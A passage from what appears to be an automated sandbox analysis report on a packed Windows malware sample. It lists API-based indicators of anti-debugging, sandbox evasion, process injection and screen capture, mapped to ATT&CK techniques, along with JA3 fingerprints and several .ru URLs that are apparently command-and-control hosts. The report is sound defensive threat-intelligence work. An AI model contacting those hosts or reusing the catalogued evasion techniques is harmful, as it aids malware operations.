\"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API \"WaitForSingleObject\" (Indicator: \"WaitForSingleObject\"; Source: \"00000000-00005808.00000000.72468.00A91000.00000020.mdmp\")\n Found reference to API \"WaitForMultipleObjects\" (Indicator: \"WaitForMultipleObjects\"; Source: \"00000000-00005808.00000000.72468.00A91000.00000020.mdmp\")\n Found reference to API \"QueryPerformanceCounter\" (Indicator: \"QueryPerformanceCounter\"; Source: \"00000000-00005808.00000000.72468.00A91000.00000020.mdmp\")\n Found reference to API \"GetSystemTimeAsFileTime\" (Indicator: \"GetSystemTimeAsFileTime\"; Source: \"00000000-00005808.00000000.72468.00A91000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "string-92", "type": 2, "relevance": 1, "name": "Contains ability to inject code into another process (API string)", "description": "Found reference to API \"CreateThread\" (Indicator: \"CreateThread\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API \"CreateThread\" (Indicator: \"CreateThread\"; Source: \"00000000-00005808.00000000.72468.00A91000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "memorydump-8", "type": 20, "relevance": 1, "name": "Found PE header in memory", "description": "Found PE header \"MZ\" - Source: \"00000000-00003852.00000000.71809.00400000.00000040.mdmp\")", "origin": "Memory Dumps", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level_human": "informative", "category": "Anti-Reverse Engineering", "identifier": "string-183", "type": 2, "relevance": 1, "name": "Contains ability to check debugger is running (API string)", "description": "Found reference to API \"OutputDebugStringW\" (Indicator: \"OutputDebugString\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API \"QueryPerformanceCounter\" (Indicator: \"QueryPerformanceCounter\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API \"OutputDebugStringA\" (Indicator: \"OutputDebugString\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API \"GetTickCount\" (Indicator: \"GetTickCount\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")", "origin": "File/Memory", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622"}, {"threat_level_human": "informative", "category": "Anti-Reverse Engineering", "identifier": "string-148", "type": 2, "relevance": 1, "name": "Contains ability to register a top-level exception handler (API string)", "description": "Found reference to API \"UnhandledExceptionFilter\" (Indicator: \"UnhandledExceptionFilter\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API \"SetUnhandledExceptionFilter\" (Indicator: \"SetUnhandledExceptionFilter\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API \"SetUnhandledExceptionFilter\" (Indicator: \"UnhandledExceptionFilter\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")", "origin": "File/Memory", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622"}, {"threat_level_human": "informative", "category": "Anti-Reverse Engineering", "identifier": "static-5", "relevance": 10, "name": "PE file contains zero-size sections", "description": "Raw size of \"UPX0\" is zero", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-171", "type": 2, "relevance": 1, "name": "Contains ability to retrieve the OS information (API string)", "description": "Found reference to API \"GetVersionExW\" (Indicator: \"GetVersionExW\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API \"GetVersionExW\" (Indicator: \"GetVersion\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API \"GetVersionExA\" (Indicator: \"GetVersionExA\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API \"GetVersionExA\" (Indicator: \"GetVersion\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API \"GetVersionExA\" (Indicator: \"GetVersionExA\"; Source: \"00000000-00005808.00000000.72468.00A91000.00000020.mdmp\")\n Found reference to API \"GetVersionExA\" (Indicator: \"GetVersion\"; Source: \"00000000-00005808.00000000.72468.00A91000.00000020.mdmp\")\n Found reference to API \"GetVersionExW\" (Indicator: \"GetVersionExW\"; Source: \"00000000-00005808.00000000.72468.00A91000.00000020.mdmp\")\n Found reference to API \"GetVersionExW\" (Indicator: \"GetVersion\"; Source: \"00000000-00005808.00000000.72468.00A91000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-201", "type": 2, "relevance": 1, "name": "Contains ability to query system locale (API string)", "description": "Found reference to API \"GetLocaleInfoW\" (Indicator: \"GetLocaleInfo\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API \"GetLocaleInfoW\" (Indicator: \"GetLocaleInfo\"; Source: \"00000000-00005808.00000000.72468.00A91000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-249", "type": 2, "relevance": 1, "name": "Contains ability to retrieve file time (API string)", "description": "Found reference to API \"GetSystemTimeAsFileTime\" (Indicator: \"GetSystemTimeAsFileTime\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API \"GetSystemTimeAsFileTime\" (Indicator: \"GetSystemTimeAsFileTime\"; Source: \"00000000-00005808.00000000.72468.00A91000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-78", "type": 3, "relevance": 1, "name": "Contains ability to read software policies", "description": "\"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"TRANSPARENTENABLED\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-661", "type": 2, "relevance": 1, "name": "Able to identify virtual environment by using user activity (API string)", "description": "file/memory contains long string with (Indicator: \"GetCommandLine\"; File: \"DISMHOST.EXE.67A47DCC.bin\")\n Found string \"GetCommandLineW\" (Indicator: \"GetCommandLine\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found string \"GetCommandLineW\" (Indicator: \"GetCommandLine\"; Source: \"00000000-00005808.00000000.72468.00A91000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-247", "type": 2, "relevance": 1, "name": "Contains ability to retrieve machine time (API string)", "description": "Found reference to API \"GetSystemTimeAsFileTime\" (Indicator: \"GetSystemTime\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API \"GetSystemTimeAsFileTime\" (Indicator: \"GetSystemTime\"; Source: \"00000000-00005808.00000000.72468.00A91000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1124", "attck_id_wiki": "https://attack.mitre.org/techniques/T1124"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-167", "type": 2, "relevance": 1, "name": "Contains ability to retrieve the contents of the STARTUPINFO structure (API string)", "description": "Found reference to API \"GetStartupInfoAlstrcpy\" (Indicator: \"GetStartupInfo\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API \"GetStartupInfoA\" (Indicator: \"GetStartupInfo\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")", "origin": "File/Memory", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-143", "type": 2, "relevance": 1, "name": "Contains ability to retrieve system language (API string)", "description": "Found reference to API \"GetUserDefaultUILanguage\" (Indicator: \"GetUserDefaultUILanguage\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API \"GetSystemDefaultUILanguage\" (Indicator: \"GetSystemDefaultUILanguage\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API \"GetSystemDefaultUILanguage\" (Indicator: \"GetSystemDefaultUILanguage\"; Source: \"00000000-00005808.00000000.72468.00A91000.00000020.mdmp\")\n Found reference to API \"GetUserDefaultUILanguage\" (Indicator: \"GetUserDefaultUILanguage\"; Source: \"00000000-00005808.00000000.72468.00A91000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-365", "type": 2, "relevance": 1, "name": "Contains ability to perform scheduled transfer (API string)", "description": "Found reference to API \"GetSystemTimeAsFileTime\" (Indicator: \"GetSystemTime\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API \"GetSystemTimeAsFileTime\" (Indicator: \"GetSystemTime\"; Source: \"00000000-00005808.00000000.72468.00A91000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1029", "attck_id_wiki": "https://attack.mitre.org/techniques/T1029"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "stream-31", "type": 1, "relevance": 1, "name": "Contains ability to retrieve/open a process", "description": "OpenProcess@KERNEL32.DLL at 00000000-00003852-37687-3-004055BB", "origin": "Hybrid Analysis Technology", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-78", "type": 2, "relevance": 1, "name": "Contains ability to capture screen (API string)", "description": "Found reference to API \"GetDC\" (Indicator: \"GetDC\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")", "origin": "File/Memory", "attck_id": "T1113", "attck_id_wiki": "https://attack.mitre.org/techniques/T1113"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-207", "type": 2, "relevance": 1, "name": "Contains ability to retrieve file and directory information (API string)", "description": "Found reference to API \"GetFileAttributesW\" (Indicator: \"GetFileAttributes\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API \"GetSystemDirectoryW\" (Indicator: \"GetSystemDirectory\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API \"GetSystemDirectoryW\" (Indicator: \"GetSystemDirectory\"; Source: \"00000000-00005808.00000000.72468.00A91000.00000020.mdmp\")\n Found reference to API \"GetFileAttributesW\" (Indicator: \"GetFileAttributes\"; Source: \"00000000-00005808.00000000.72468.00A91000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-229", "type": 2, "relevance": 1, "name": "Contains ability to query registry keys (API string)", "description": "Found reference to API \"RegQueryValueExW\" (Indicator: \"RegQueryValue\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API \"RegOpenKeyExW\" (Indicator: \"RegOpenKey\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API \"RegQueryValueExW\" (Indicator: \"RegQueryValue\"; Source: \"00000000-00005808.00000000.72468.00A91000.00000020.mdmp\")\n Found reference to API \"RegOpenKeyExW\" (Indicator: \"RegOpenKey\"; Source: \"00000000-00005808.00000000.72468.00A91000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-85", "type": 2, "relevance": 1, "name": "Contains ability to enumerate process and/or its information (API string)", "description": "Found reference to API \"GetCurrentProcess\" (Indicator: \"GetCurrentProcess\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API \"GetCurrentProcessId\" (Indicator: \"GetCurrentProcess\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API \"GetModuleHandleA\" (Indicator: \"GetModuleHandle\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API \"GetModuleHandleW\" (Indicator: \"GetModuleHandle\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API \"GetModuleHandleExW\" (Indicator: \"GetModuleHandle\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API \"GetModuleHandleW\" (Indicator: \"GetModuleHandle\"; Source: \"00000000-00005808.00000000.72468.00A91000.00000020.mdmp\")\n Found reference to API \"GetModuleHandleA\" (Indicator: \"GetModuleHandle\"; Source: \"00000000-00005808.00000000.72468.00A91000.00000020.mdmp\")\n Found reference to API \"GetCurrentProcessId\" (Indicator: \"GetCurrentProcess\"; Source: \"00000000-00005808.00000000.72468.00A91000.00000020.mdmp\")\n Found reference to API \"GetCurrentProcess\" (Indicator: \"GetCurrentProcess\"; Source: \"00000000-00005808.00000000.72468.00A91000.00000020.mdmp\")\n Found reference to API \"GetModuleHandleExW\" (Indicator: \"GetModuleHandle\"; Source: \"00000000-00005808.00000000.72468.00A91000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-205", "type": 2, "relevance": 1, "name": "Contains ability to retrieve the time elapsed since the system was started (API string)", "description": "Found reference to API \"GetTickCount\" (Indicator: \"GetTickCount\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API \"GetTickCount\" (Indicator: \"GetTickCount\"; Source: \"00000000-00005808.00000000.72468.00A91000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-427", "type": 2, "relevance": 1, "name": "Contains ability to retrieve a module handle (API string)", "description": "Found reference to API \"GetModuleHandleA\" (Indicator: \"GetModuleHandle\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API \"GetModuleHandleW\" (Indicator: \"GetModuleHandle\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API \"GetModuleHandleExW\" (Indicator: \"GetModuleHandle\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API \"GetModuleHandleW\" (Indicator: \"GetModuleHandle\"; Source: \"00000000-00005808.00000000.72468.00A91000.00000020.mdmp\")\n Found reference to API \"GetModuleHandleA\" (Indicator: \"GetModuleHandle\"; Source: \"00000000-00005808.00000000.72468.00A91000.00000020.mdmp\")\n Found reference to API \"GetModuleHandleExW\" (Indicator: \"GetModuleHandle\"; Source: \"00000000-00005808.00000000.72468.00A91000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-115", "type": 2, "relevance": 3, "name": "Contains ability to retrieve data about the local computer (API string)", "description": "Found reference to API \"InterlockedExchange\" (Indicator: \"InterlockedExchange\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API \"InterlockedExchange\" (Indicator: \"InterlockedExchange\"; Source: \"00000000-00005808.00000000.72468.00A91000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-317", "type": 2, "relevance": 1, "name": "Contains ability to retrieve address of exported function from a DLL (API string)", "description": "Found reference to API \"GetProcAddress\" (Indicator: \"GetProcAddress\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API \"GetProcAddress\" (Indicator: \"GetProcAddress\"; Source: \"00000000-00005808.00000000.72468.00A91000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-82", "type": 2, "relevance": 1, "name": "Contains ability to retrieves the class object from a DLL object handler (API string)", "description": "Found reference to API \"p_DllGetClassObject\" (Indicator: \"DllGetClassObject\"; Source: \"00000000-00005808.00000000.72468.00A91000.00000020.mdmp\")", "origin": "File/Memory"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-164", "type": 2, "relevance": 1, "name": "Contains ability to retrieve the fully qualified path of module (API string)", "description": "Found reference to API \"GetModuleFileNameW\" (Indicator: \"GetModuleFileName\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API \"GetModuleFileNameW\" (Indicator: \"GetModuleFileName\"; Source: \"00000000-00005808.00000000.72468.00A91000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "string-3", "type": 2, "relevance": 3, "name": "Found potential URL in binary/memory", "description": "Heuristic match: \";%.at\"\n Heuristic match: \"v3.gt\"\n Pattern match: \"http://jackpotmsk.ru/29wa3pokqwcthxsabuzygjqzglx9/\"\n Pattern match: \"http://piterfm1.ru/29wa3pokqwcthxsabuzygjqzglx9/\"\n Pattern match: \"http://bingoforus.ru/29wa3pokqwcthxsabuzygjqzglx9/\"\n Pattern match: \"http://rusradio1.ru/29wa3pokqwcthxsabuzygjqzglx9/\"", "origin": "File/Memory", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "string-457", "type": 2, "relevance": 1, "name": "Found string related to HTTP headers", "description": "Found string \"HTTP/1.1 200 OK\" (Indicator: \"HTTP/1.1\"; Source: \"00000000-00003852.00000000.71809.00400000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "memorydump-2", "type": 20, "relevance": 1, "name": "Found potential URLs in memory dumps", "description": "Found URL \"http://jackpotmsk.ru/29wa3pokqwcthxsabuzygjqzglx9/http://piterfm1.ru/29wa3pokqwcthxsabuzygjqzglx9/http://bingoforus.ru/29wa3pokqwcthxsabuzygjqzglx9/http://rusradio1.ru/29wa3pokqwcthxsabuzygjqzglx9/winnt_f5068c1dd422winnt_abe81be47e0dprocess_mt_process_et_winnt_0d796d2edf41svrwsc.exesvrwscwindows\" - Source: \"00000000-00003852.00000000.71809.00400000.00000040.mdmp\")", "origin": "Memory Dumps", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "string-14", "type": 2, "name": "Found potential IP address in binary/memory", "description": "\"<IPv4>\"", "origin": "File/Memory", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "network-55", "type": 7, "relevance": 1, "name": "JA3 SSL client fingerprint", "description": "Observed JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d\n Observed JA3 fingerprint: db95a4cb23548a635a1dfebcee9991cb", "origin": "Network Traffic"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "string-114", "type": 2, "relevance": 1, "name": "Contains ability to obtains specified information about the security of a file or directory (API string)", "description": "Found reference to API \"AddAce\" (Indicator: \"AddAce\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API \"SetSecurityDescriptorOwner\" (Indicator: \"SetSecurityDescriptorOwner\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API \"CopySid\" (Indicator: \"CopySid\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API \"GetSecurityDescriptorControl\" (Indicator: \"GetSecurityDescriptorControl\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API \"InitializeAcl\" (Indicator: \"InitializeAcl\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API \"GetAclInformation\" (Indicator: \"GetAclInformation\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API \"SetSecurityDescriptorDacl\" (Indicator: \"SetSecurityDescriptorDacl\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API \"GetSidSubAuthority\" (Indicator: \"GetSidSubAuthority\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API \"GetSecurityDescriptorGroup\" (Indicator: \"GetSecurityDescriptorGroup\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API \"MakeAbsoluteSD\" (Indicator: \"MakeAbsoluteSD\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API \"GetSecurityDescriptorOwner\" (Indicator: \"GetSecurityDescriptorOwner\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API \"IsValidSid\" (Indicator: \"IsValidSid\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API \"GetSecurityDescriptorDacl\" (Indicator: \"GetSecurityDescriptorDacl\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API \"GetSecurityDescriptorSacl\" (Indicator: \"GetSecurityDescriptorSacl\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API \"GetLengthSid\" (Indicator: \"GetLengthSid\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API \"InitializeSid\" (Indicator: \"InitializeSid\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API \"GetSidLengthRequired\" (Indicator: \"GetSidLengthRequired\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API \"InitializeSecurityDescriptor\" (Indicator: \"InitializeSecurityDescriptor\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API \"SetSecurityDescriptorGroup\" (Indicator: \"SetSecurityDescriptorGroup\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API \"IsValidSecurityDescriptor\" (Indicator: \"IsValidSecurityDescriptor\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API \"AddAce\" (Indicator: \"AddAce\"; Source: \"00000000-00005808.00000000.72468.00A91000.00000020.mdmp\")\n Found reference to API \"InitializeAcl\" (Indicator: \"InitializeAcl\"; Source: \"00000000-00005808.00000000.72468.00A91000.00000020.mdmp\")\n Found reference to API \"GetSecurityDescriptorControl\" (Indicator: \"GetSecurityDescriptorControl\"; Source: \"00000000-00005808.00000000.72468.00A91000.00000020.mdmp\")\n Found reference to API \"MakeAbsoluteSD\" (Indicator: \"MakeAbsoluteSD\"; Source: \"00000000-00005808.00000000.72468.00A91000.00000020.mdmp\")\n Found reference to API \"GetSecurityDescriptorSacl\" (Indicator: \"GetSecurityDescriptorSacl\"; Source: \"00000000-00005808.00000000.72468.00A91000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "string-474", "type": 2, "relevance": 1, "name": "Contains ability to access device drivers", "description": "Found string \"\\Device\\HarddiskVolume2\\Windows\\Temp\\934AF651-B8D9-4E44-925A-CD0CD0D309A4\\DismHost.exe\" (Indicator: \"\\Device\\\"; Source: \"00000000-00005808.00000000.72468.001A0000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "static-87", "relevance": 1, "name": "Imports system security related APIs", "description": "Observed import api \"AddAce\" which can \"Adds one or more access control entries (ACEs) to a specified access control list (ACL)\" [Source: 8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c]\n Observed import api \"AddAce\" which can \"Adds one or more access control entries (ACEs) to a specified access control list (ACL)\" [Source: DISMHOST.EXE.67A47DCC.bin]\n Observed import api \"CopySid\" which can \"Copies a security identifier (SID) to a buffer\" [Source: DISMHOST.EXE.67A47DCC.bin]\n Observed import api \"GetAclInformation\" which can \"Retrieves information about an access control list (ACL)\" [Source: DISMHOST.EXE.67A47DCC.bin]\n Observed import api \"GetLengthSid\" which can \"Returns the length in bytes of a valid security identifier (SID)\" [Source: DISMHOST.EXE.67A47DCC.bin]\n Observed import api \"GetSecurityDescriptorControl\" which can \"Retrieves a security descriptor control and revision information\" [Source: DISMHOST.EXE.67A47DCC.bin]\n Observed import api \"GetSecurityDescriptorDacl\" which can \"Retrieves a pointer to the discretionary access control list (DACL) in a specified security descriptor\" [Source: DISMHOST.EXE.67A47DCC.bin]\n Observed import api \"GetSecurityDescriptorGroup\" which can \"Retrieves the primary group information from a security descriptor\" [Source: DISMHOST.EXE.67A47DCC.bin]\n Observed import api \"GetSecurityDescriptorOwner\" which can \"Retrieves the owner information from a security descriptor\" [Source: DISMHOST.EXE.67A47DCC.bin]\n Observed import api \"GetSecurityDescriptorSacl\" which can \"Retrieves a pointer to the system access control list (SACL) in a specified security descriptor\" [Source: DISMHOST.EXE.67A47DCC.bin]\n Observed import api \"GetSidLengthRequired\" which can \"Returns the length, in bytes, of the buffer required to store a SID with a specified number of subauthorities\" [Source: DISMHOST.EXE.67A47DCC.bin]\n Observed import api \"GetSidSubAuthority\" which can \"Returns a pointer to a specified subauthority in a security identifier (SID)\" [Source: DISMHOST.EXE.67A47DCC.bin]\n Observed import api \"InitializeAcl\" which can \"Initializes a new ACL structure\" [Source: DISMHOST.EXE.67A47DCC.bin]\n Observed import api \"InitializeSecurityDescriptor\" which can \"Initializes a new security descriptor\" [Source: DISMHOST.EXE.67A47DCC.bin]\n Observed import api \"InitializeSid\" which can \"Initializes a security identifier (SID)\" [Source: DISMHOST.EXE.67A47DCC.bin]\n Observed import api \"IsValidSecurityDescriptor\" which can \"Determines whether the components of a security descriptor are valid\" [Source: DISMHOST.EXE.67A47DCC.bin]\n Observed import api \"IsValidSid\" which can \"Validates a security identifier (SID) by verifying that the revision number is within a known range and that the number of subauthorities is less than the maximum\" [Source: DISMHOST.EXE.67A47DCC.bin]\n Observed import api \"MakeAbsoluteSD\" which can \"Creates a security descriptor in absolute format by using a security descriptor in self-relative format as a template\" [Source: DISMHOST.EXE.67A47DCC.bin]\n Observed import api \"SetSecurityDescriptorDacl\" which can \"Sets information in a discretionary access control list (DACL)\" [Source: DISMHOST.EXE.67A47DCC.bin]\n Observed import api \"SetSecurityDescriptorGroup\" which can \"Sets the primary group information of an absolute-format security descriptor replacing any primary group information already present in the security descriptor\" [Source: DISMHOST.EXE.67A47DCC.bin]\n Observed import api \"SetSecurityDescriptorOwner\" which can \"Sets the owner information of an absolute-format security descriptor\" [Source: DISMHOST.EXE.67A47DCC.bin]", "origin": "Static Parser", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "string-316", "type": 2, "relevance": 1, "name": "Contains ability to terminate a process (API string)", "description": "Found reference to API \"ExitProcess\" (Indicator: \"ExitProcess\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API \"TerminateProcess\" 